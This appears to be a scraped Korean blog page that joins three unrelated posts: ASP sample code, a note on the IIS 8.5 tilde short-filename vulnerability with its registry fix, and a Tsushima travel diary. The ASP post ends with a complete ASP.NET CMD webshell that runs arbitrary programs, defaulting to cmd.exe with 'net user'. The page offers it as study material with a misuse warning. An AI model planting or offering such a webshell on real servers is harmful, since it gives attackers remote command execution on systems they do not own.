반응형

1. Hello World! 출력


<!DOCTYPE html>
<html>
<body>

<%response.write("Hello World!")%>

</body>

</html>


2. 구구단 출력


<%

response.write "<table border='1'><tr>"

 

 for i = 1 to 9


 response.write "<td>"

  

  for j = 1 to 9

   response.write  i & "*" & j & " = " & i * j & "&nbsp;<br>"

  next

  

  

  If i = 3 or i = 6 then

   response.write "</td><tr>"

  Else

   response.write "</td>"

  end if

 

 next

  

  response.write "</tr></table>"

%>


3. 서버 정보 


<HTML>

<BODY>

<TABLE>

<% for each key in Request.ServerVariables %>

<TR>

<TD><%=key %></TD>

<TD>

<%

if Request.ServerVariables(key) = "" Then

Response.Write " "

else

Response.Write Request.ServerVariables(key)

end if

%>

</TD>

</TR>

<% Next %>

</TABLE>

</BODY>

</HTML>


4. CMD Webshell (악용금지!!)


   <%@ Page Language="VB" Debug="true" %>

   <%@ import Namespace="system.IO" %>

   <%@ import Namespace="System.Diagnostics" %>

   

   <script runat="server">      

   Sub RunCmd(Src As Object, E As EventArgs)            

     Dim myProcess As New Process()            

     Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            

     myProcessStartInfo.UseShellExecute = false            

     myProcessStartInfo.RedirectStandardOutput = true            

     myProcess.StartInfo = myProcessStartInfo            

     myProcessStartInfo.Arguments=xcmd.text            

     myProcess.Start()            

     Dim myStreamReader As StreamReader = myProcess.StandardOutput            

     Dim myString As String = myStreamReader.Readtoend()            

     myProcess.Close()            

     mystring=replace(mystring,"<","&lt;")            

     mystring=replace(mystring,">","&gt;")            

     result.text= vbcrlf & "<pre>" & mystring & "</pre>"    

   End Sub

   </script>

   

   <html>

   <body>    

   <form runat="server">        

   <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        

   <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        

   <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        

   <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        

   <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        

   <p><asp:Label id="result" runat="server"></asp:Label>       

   </form>

   </body>

   </html>


반응형
저작자표시 비영리 변경금지

'Study > Web' 카테고리의 다른 글

[JS] ISSAC 암호화 솔루션 복호화  (0) 2019.04.01
[JSP] 파일업로드 확장자 우회  (1) 2019.03.19
[IIS] Microsoft IIS/8.5 - 틸드문자 취약점  (0) 2019.01.04
[BurpSuite] handshake alert: unrecognized_name 문제 해결  (0) 2018.06.07
HTML과 JavaScript를 사용해 간단한 계산기 만들기  (0) 2014.08.06
반응형

1. 개요


일부 IIS 서버에서 MS-DOS와의 호환을 위해 Short-FileName(SFN)을 사용 / 8.3 File Name 규칙을 허용한 경우 발생하는 취약점이다.


지금까지 IIS 하위 버전(7이하)에서만 발견되는줄 알았으나, 8.3 File Name을 지원하는 경우 Microsoft IIS/8.5 버전에서도 취약했다.


하지만, Microsoft IIS/8.5 버전에서는 파일  및 디렉토리의 존재 유무에 따른 응답값이 다른 것을 웹 사이트 상으로 확인이 불가하였다.

(DEBUG 메소드를 사용하기 때문인 듯...)


즉, 툴을 사용해서 틸드문자 취약성을 판단해야 한다.



2. 툴 다운로드 및 사용법


툴 다운로드 링크 >> https://github.com/irsdl/iis-shortname-scanner/


위 링크에서 툴을 다운로드 한 후, 압축을 풀면 run.bat 배치파일로 실행 가능하며, cmd 창에서 iis_shortname_scanner.jar 실행으로도 가능하다.



>> 타겟 URL을 지정할 때는 폴더까지 지정해주는 것이 좋다.

>> 쓰레드 수는 최대한 낮게 설정해주는 것이 서버 부하를 줄일 수 있다(0도 가능)



결과를 보면, 해당 URL/폴더/ 하위에는 default.asp, modify.asp, view.asp, write.asp 등의 파일이 존재한다는 것이 유추 가능하다.


3. 대응방안


[ 8.3 File Name 비활성화 ] (8 버전 이상의 서버에서는 유일한 대응방법..인듯)


1. 레지스트리 편집기에서 HKLM/SYSTEM/CurrentControlSet/Control/FileSystem 내 NtfsDisable8dot3NameCreation 값을 1로 설정


2. 기존에 생성되어 있는 파일의 8.3 FileName 비활성화

1. 현재 디렉토리를 복사한 후 디렉토리 명을 New(예시임)로 지정한다. 

2. 현재 디렉토리의 디렉토리 명을 Old로 지정한다. 

3. New디렉토리 명을 원래 파일명으로 지정한다.


4. 참고 사이트


http://laughfool.tistory.com/32

https://github.com/irsdl/iis-shortname-scanner/

반응형
저작자표시 비영리 변경금지

'Study > Web' 카테고리의 다른 글

[JSP] 파일업로드 확장자 우회  (1) 2019.03.19
[ASP] Sample Code + CMD Webshell  (0) 2019.01.08
[BurpSuite] handshake alert: unrecognized_name 문제 해결  (0) 2018.06.07
HTML과 JavaScript를 사용해 간단한 계산기 만들기  (0) 2014.08.06
웹 프로그래밍 언어 소개  (0) 2014.07.08
반응형


대망의 마지막날!!은 한거 별로 없습니다ㅋㅋㅋ

일단, 히타카츠에서 배를 타야했기 때문에 아침일찍 이즈하라를 떠나 히타카츠에 입성 했습니다.

렌트카를 반납하기 전, 점심을 먹으러 항구 근처에 있는 마루후쿠라멘집을 찾았습니다.


#점심 - 마루후쿠라멘

일본에 와서 라멘은 꼭 먹고가고 싶다는 일념 하나로!! 배시간 전에 히타카츠 도착해서 라멘집으로 직행!

이 가게에서 유명하고 Best 메뉴인 차슈라멘맛계란라멘을 주문했죠.

역시나 맛있습니다!!

크크크 개인적으로 계란을 좋아해서 맛계란라멘이 더 맛있게 느껴졌어요^^(베이스는 같음. 토핑 차이인듯)





마지막 식사 후에 배를 타고 한국으로 귀국했습니다...

한국의 제주도 느낌이라 가족여행지로 안성맞춤인 여행지라고 느꼈습니다.

산과 바다 실컷 볼 수 있고, 한적한...

빠르게 둘러보시면 2박3일이면 충분하구요, 1박2일도 중간에 몇개 빼면 가능할 것 같아요.


#3박 4일 경비 지출

※대표적인 지출만 정리하였습니다.

1) 배(승선료) : ₩70000 * 3人 = ₩210000

2) 부둣세 & 유류세 : 부산항 = ₩8300 * 3人 = ₩24900

                           히타카츠항 = 800¥ * 3人 = 2400엔

3) 숙소비 : 이즈하라 = 약 ₩376767

              히타카츠 = 13500¥

4) 렌트비 : ₩148300

5) 주유비 : 약 5000¥

6) 식비 : 약 21000¥(3인가격)

7) 기타(쇼핑 등) : 약 8000¥ 


⇒ 약 인당 50만원 정도


반응형
저작자표시 비영리 변경금지

'Travel > 해외' 카테고리의 다른 글

[2019.01.27 - 2019.02.03] 방콕 DAY2  (1) 2019.02.20
[2019.01.27 - 2019.02.03] 방콕 DAY1  (1) 2019.02.09
[2018.09.04 - 2018.09.07] 대마도 DAY 3  (0) 2018.10.14
[2018.09.04 - 2018.09.07] 대마도 DAY 2  (0) 2018.10.13
[2018.09.04 - 2018.09.07] 대마도 DAY 1  (0) 2018.10.09

+ Recent posts

반응형
반응형

티스토리툴바